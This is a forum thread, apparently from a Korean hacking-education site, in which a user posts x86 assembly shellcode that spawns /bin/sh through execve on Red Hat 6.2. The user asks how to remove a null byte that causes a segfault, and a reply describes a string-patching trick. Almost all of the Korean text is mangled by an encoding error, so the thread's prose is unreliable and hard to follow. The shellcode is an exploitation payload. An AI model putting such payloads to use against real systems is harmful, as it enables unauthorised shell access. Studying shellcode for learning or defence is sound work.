½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   kumi123
   ½©ÄÚµå ÀÛ¼ºÁß¿¡

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1686 [º¹»ç]


os : redhat 6.2

½©ÄÚµå ÀÛ¼º Áß¿¡..

.globl main

main:
            jmp call
func:
            xor   %eax, %eax
            movl %eax, 0x4(%esp)
            movl %esp, %ecx
            popl  %ebx
        
            --- movl  %eax, 0x7(%ebx) ---

            movb $0xb, %al
            xor    %edx, %edx
            int     $0x80
call:
             call func
             .string "/bin/sh\0"

¿©±â¼­ /bin/sh\0 ¿¡ ³ÎÀ» ¾ø¾Ö°í ½ÍÀºµ¥..

À§¿¡ °­Á¶ ºÎºÐÀ» Çϸé,

¼¼±×¸ÕÆ® ÆÞ½º °¡ ¶ß´õ±º¿ä..
±×·¡¼­, °Ë»öÇØº¸´Ï.. .text¿µ¿ªÀ» °Çµå·Á¼­ ¿À·ù°¡ ³­´Ù°í ³ª¿ÍÀִµ¥¿ä..

±×·³ Àú±â¼­ \0À» ¾ø¾Ö°í ½ÍÀ¸¸é.. Äڵ带 ¾î¶»°Ô ¹Ù²ã¾ß Çϳª¿ä?

  Hit : 3386     Date : 2013/06/06 03:16



    
Silk ¹æ¹ýÀº ¾ÆÁÖ ´Ù¾çÇÕ´Ï´Ù. ¾ÖÃÊ¿¡ /bin/sh\0ÀÌ ¾Æ´Ñ /bin/shA ·Î ³Ö°í
/bin/shÀÇ ½ÃÀÛÁÖ¼Ò¸¦ ¾òÀº ÈÄ¿¡ A ±îÁö ¿ÀÇÁ¼ÂÀ» ¶Ú ÈÄ ±× À§Ä¡¿¡ 0À» ¹Û¾Æ³Ö´Â ¹æ½ÄÀ» »ç¿ëÇÒ ¼ö ÀÖ½À´Ï´Ù.
2013/06/13